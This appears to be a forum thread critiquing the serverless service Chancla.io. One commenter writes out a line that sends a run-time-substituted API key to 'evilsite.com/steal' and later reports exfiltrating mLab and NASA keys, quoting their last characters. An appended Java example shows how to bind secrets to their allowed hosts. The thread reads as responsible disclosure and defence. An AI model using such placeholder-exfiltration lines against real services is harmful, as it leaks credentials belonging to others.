by insomniacity 2689 days ago
For your submission, you might want to think about writing a blog post instead of linking to your front page. The question mark in the title is also misleading when it's your own site.

As for the site, you probably need to break your examples out into a separate page (apart from maybe one, that demonstrates some killer features), and think carefully about how much to include above the fold. There are 164 words across the three boxes, and you will lose people.

As for the service - personally I don't quite get it. Is the idea "ease of PHP, power of serverless JVM"? Not sure why I want inexperienced developers contributing to my projects?

And a question:

  "During run-time, Chancla.io replaces the security token with the real API security key before calling the third-party API."

Then you show:

  new URL("https://api.mlab.com/api/1/databases/commerce-db/collections/cart?apiKey={{mlab_security_key}}")

Is that an example shared security key? Could I exfiltrate that by doing this?:

  new URL("https://evilsite.com/steal?key={{mlab_security_key}}")
1 comments

Appreciate your insightful feedback, very helpful!

Here are a few follow-on responses:

1. Your feedback about individual blog posts is completely correct. We will definitely go that direction with new content.

2. The killer feature list is still absent on the home page. We will correct that.

3. I can tell you are a very experienced developer. If you are looking for new projects, please let me know, we can use someone like you on our team (not kidding). Regarding your inexperienced developers comment, I'm fairly certain all companies would love to have a team full of experienced developers, like yourself, I know I would. Unfortunately, not every company has a roster full of experienced developers. Most teams contain a blend of experienced and inexperienced developers, and the experienced developers are often too busy solving hard problems, which leaves the inexperienced developers to fend for themselves. Not really the best scenario for most companies. Would you agree?

4. If you issue the command, new URL("https://evilsite.com/steal?key={{mlab_security_key}}") in our sandbox editor, you will not exfiltrate the actual security key. You will receive a page not found error or bad request error. That said, if you are able to exfiltrate the actual security key, please let us know, that's a security bug on our end.

Thank you again for your comments!

OK - I believe I exfil'd the mLab and NASA security keys. The first ends in 'Sdu' and the second ends in 'C7V'. Do you want me to email you?
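
An added example, not part of the thread and not Chancla.io's code: one way a platform that substitutes `{{token}}` placeholders at run time can stop the key from leaving for an arbitrary host is to bind each secret to the single host it is meant for and check the destination before substituting. The class name, the vault map and the key value are assumptions constructed for illustration; the two URLs are the ones quoted in the thread.

```java
import java.net.URI;
import java.util.Map;
import java.util.regex.Matcher;
import java.util.regex.Pattern;

public class BoundSecrets {
    // A secret plus the only host it may be sent to (values constructed for this example).
    record Secret(String value, String allowedHost) {}

    static final Pattern TOKEN = Pattern.compile("\\{\\{(\\w+)\\}\\}");
    static final Map<String, Secret> VAULT = Map.of(
        "mlab_security_key", new Secret("EXAMPLE-NOT-A-REAL-KEY", "api.mlab.com"));

    // Returns the URL with real keys filled in, or throws if any token would
    // be sent to a host other than the one it is bound to.
    static String resolve(String template) {
        // Parse the destination with tokens masked, so the host is decided
        // before any secret material is touched. A token placed in the
        // authority part changes the parsed host and fails the check below.
        URI dest = URI.create(TOKEN.matcher(template).replaceAll("x"));
        if (!"https".equalsIgnoreCase(dest.getScheme()) || dest.getHost() == null)
            throw new SecurityException("https URL with a host required");
        Matcher m = TOKEN.matcher(template);
        StringBuilder out = new StringBuilder();
        while (m.find()) {
            Secret s = VAULT.get(m.group(1));
            if (s == null) throw new SecurityException("unknown token " + m.group(1));
            if (!s.allowedHost().equalsIgnoreCase(dest.getHost()))
                throw new SecurityException(m.group(1) + " is not bound to " + dest.getHost());
            m.appendReplacement(out, Matcher.quoteReplacement(s.value()));
        }
        m.appendTail(out);
        return out.toString();
    }

    public static void main(String[] args) {
        String[] templates = {
            "https://api.mlab.com/api/1/databases/commerce-db/collections/cart?apiKey={{mlab_security_key}}",
            "https://evilsite.com/steal?key={{mlab_security_key}}"
        };
        for (String t : templates) {
            try { System.out.println("allowed: " + resolve(t)); }
            catch (SecurityException e) { System.out.println("refused: " + e.getMessage()); }
        }
    }
}
```

The check only holds if substitution happens at the egress point, after sandboxed code can no longer read the resolved string, and if error responses never echo the resolved URL back to the caller.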